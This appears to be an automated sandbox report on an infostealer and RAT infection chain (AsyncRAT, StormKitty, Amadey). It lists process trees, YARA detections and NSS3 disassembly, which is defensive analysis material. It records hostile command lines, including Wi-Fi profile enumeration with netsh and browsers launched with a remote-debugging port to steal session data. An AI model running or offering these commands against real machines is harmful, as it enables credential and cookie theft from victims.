Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Imagebase:	0x7ff7ee740000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:39:31
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe"
Imagebase:	0xd00000
File size:	179'200 bytes
MD5 hash:	FAFFBA70209547222069C4E849867640
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Joe Security Rule: infostealer_win_stormkitty, Description: Finds StormKitty samples (or their variants) based on specific strings, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Sekoia.io Rule: rat_win_asyncrat, Description: Detect AsyncRAT based on specific strings, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: Sekoia.io Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, Author: ditekSHen
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	06:39:32
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:39:33
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2600 --field-trial-handle=2568,i,14958645469672298584,2939773364007336378,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:39:38
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Imagebase:	0x2d0000
File size:	512'512 bytes
MD5 hash:	1C21807FE5D68CDBE4B25DB1F98D0178
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:39:39
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:39:39
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Imagebase:	0x7ff6a5670000
File size:	512'512 bytes
MD5 hash:	1C21807FE5D68CDBE4B25DB1F98D0178
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.3876667619.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.3875739949.0000000001397000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.3879611236.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:39:47
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:39:47
Start date:	26/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Imagebase:	0x1f593f40000
File size:	41'552 bytes
MD5 hash:	909A1D386235DD5F6BA61B91BA34119D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.3809039923.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x630000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x4d0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:39:48
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x630000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:39:49
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1080000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	06:39:50
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe"
Imagebase:	0x930000
File size:	2'668'544 bytes
MD5 hash:	87330F1877C33A5A6203C49075223B16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 48%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	06:39:50
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	06:39:50
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2172,i,12041411558634704463,13499998524665998635,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	06:39:51
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2092,i,2243381234690523858,16077404214973868286,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	06:39:57
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Imagebase:	0xfe0000
File size:	540'672 bytes
MD5 hash:	9AB250B0DC1D156E2D123D277EB4D132
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	06:39:57
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	06:39:58
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Imagebase:	0xfe0000
File size:	540'672 bytes
MD5 hash:	9AB250B0DC1D156E2D123D277EB4D132
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000003.4017208405.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	06:40:00
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xe30000
File size:	1'901'056 bytes
MD5 hash:	3FA3842503DB7F65438CDDE8B7A7DD0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000035.00000003.3869120489.0000000005630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000035.00000002.4622729473.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 6C556E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6A2120,6C557E60), ref: 6C556EBC
TlsGetValue.KERNEL32 ref: 6C556EDF
EnterCriticalSection.KERNEL32(?), ref: 6C556EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C556F25

Part of subcall function 6C52A900: TlsGetValue.KERNEL32(00000000,?,6C6A14E4,?,6C4C4DD9), ref: 6C52A90F
Part of subcall function 6C52A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C52A94F

PR_Unlock.NSS3 ref: 6C556F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C556FA9
TlsGetValue.KERNEL32 ref: 6C5570B4
EnterCriticalSection.KERNEL32(?), ref: 6C5570C8
PR_CallOnce.NSS3(6C6A24C0,6C597590), ref: 6C557104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C557117
SECOID_Init.NSS3 ref: 6C557128
PORT_Alloc_Util.NSS3(00000057), ref: 6C55714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C55717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5571A9
PR_NotifyAllCondVar.NSS3 ref: 6C5571CF
PR_Unlock.NSS3 ref: 6C5571DD
free.MOZGLUE(?), ref: 6C5571EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C557208
free.MOZGLUE(00000000), ref: 6C557221
free.MOZGLUE(00000001), ref: 6C557235
TlsGetValue.KERNEL32 ref: 6C55724A
EnterCriticalSection.KERNEL32(?), ref: 6C55725E
PR_NotifyCondVar.NSS3 ref: 6C557273
PR_Unlock.NSS3 ref: 6C557281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C557291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5572B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5572D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5572E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C557372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C690148,,defaultModDB,internalKeySlot), ref: 6C5574CC
free.MOZGLUE(00000000), ref: 6C557513
free.MOZGLUE(00000000), ref: 6C55751B
free.MOZGLUE(00000000), ref: 6C557528
free.MOZGLUE(00000000), ref: 6C55753C
free.MOZGLUE(00000000), ref: 6C557550
free.MOZGLUE(00000000), ref: 6C557561
free.MOZGLUE(00000000), ref: 6C557572
free.MOZGLUE(00000000), ref: 6C557583
free.MOZGLUE(00000000), ref: 6C557594
free.MOZGLUE(00000000), ref: 6C5575A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C5575BD
free.MOZGLUE(00000000), ref: 6C5575C8
free.MOZGLUE(00000000), ref: 6C5575F1
PR_NewLock.NSS3 ref: 6C557636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C557686
PR_NewLock.NSS3 ref: 6C5576A2

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C5576B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C557707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C55771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C557731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C55774A
DeleteCriticalSection.KERNEL32(?), ref: 6C557770
free.MOZGLUE(?), ref: 6C557779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C55779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5577AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C5577C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5577DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C557821
PORT_Alloc_Util.NSS3(?), ref: 6C557837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C55785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C55786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C5578AC
free.MOZGLUE(00000000), ref: 6C5578BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C5578F3
free.MOZGLUE(00000000), ref: 6C5578FC
free.MOZGLUE(00000000), ref: 6C55791C

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

Strings

NSS Internal Module, xrefs: 6C5574A2, 6C5574C6
extern:, xrefs: 6C55772B
,defaultModDB,internalKeySlot, xrefs: 6C55748D, 6C5574AA
sql:, xrefs: 6C5576FE
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C5574C7
kbi., xrefs: 6C557886
dbm:, xrefs: 6C557716
Spac, xrefs: 6C557389
dll, xrefs: 6C55788E
rdb:, xrefs: 6C557744

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: e327c7380f61e598606905e3dec61588eab65f3344028d206c76d6799d4e2f48
Instruction ID: fe7fd6e8eae339de76aff520e361389ff95944105547df0f8ff9897aa2301263
Opcode Fuzzy Hash: e327c7380f61e598606905e3dec61588eab65f3344028d206c76d6799d4e2f48
Instruction Fuzzy Hash: BE5235B0E11301DBEF108FA6DC457AE7BB4AF05388F54802AED09A7B51E731E964CB95

Function 6C57BFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C57C0C8

Part of subcall function 6C609440: LeaveCriticalSection.KERNEL32 ref: 6C6095CD
Part of subcall function 6C609440: TlsGetValue.KERNEL32 ref: 6C609622
Part of subcall function 6C609440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C60964E

PR_EnterMonitor.NSS3 ref: 6C57C0AE

Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C6091AA
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609212
Part of subcall function 6C609090: _PR_MD_WAIT_CV.NSS3 ref: 6C60926B

Part of subcall function 6C530600: GetLastError.KERNEL32(?,?,?,?,?,6C5305E2), ref: 6C530642
Part of subcall function 6C530600: TlsGetValue.KERNEL32(?,?,?,?,?,6C5305E2), ref: 6C53065D
Part of subcall function 6C530600: GetLastError.KERNEL32 ref: 6C530678
Part of subcall function 6C530600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C53068A
Part of subcall function 6C530600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C530693
Part of subcall function 6C530600: PR_SetErrorText.NSS3(00000000,?), ref: 6C53069D
Part of subcall function 6C530600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,5683EA68,?,?,?,?,?,6C5305E2), ref: 6C5306CA
Part of subcall function 6C530600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C5305E2), ref: 6C5306E6

PR_EnterMonitor.NSS3 ref: 6C57C0F2
PR_ExitMonitor.NSS3 ref: 6C57C10E
PR_ExitMonitor.NSS3 ref: 6C57C081

Part of subcall function 6C609440: TlsGetValue.KERNEL32 ref: 6C60945B
Part of subcall function 6C609440: TlsGetValue.KERNEL32 ref: 6C609479
Part of subcall function 6C609440: EnterCriticalSection.KERNEL32 ref: 6C609495
Part of subcall function 6C609440: TlsGetValue.KERNEL32 ref: 6C6094E4
Part of subcall function 6C609440: TlsGetValue.KERNEL32 ref: 6C609532
Part of subcall function 6C609440: LeaveCriticalSection.KERNEL32 ref: 6C60955D

PR_EnterMonitor.NSS3 ref: 6C57C068

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

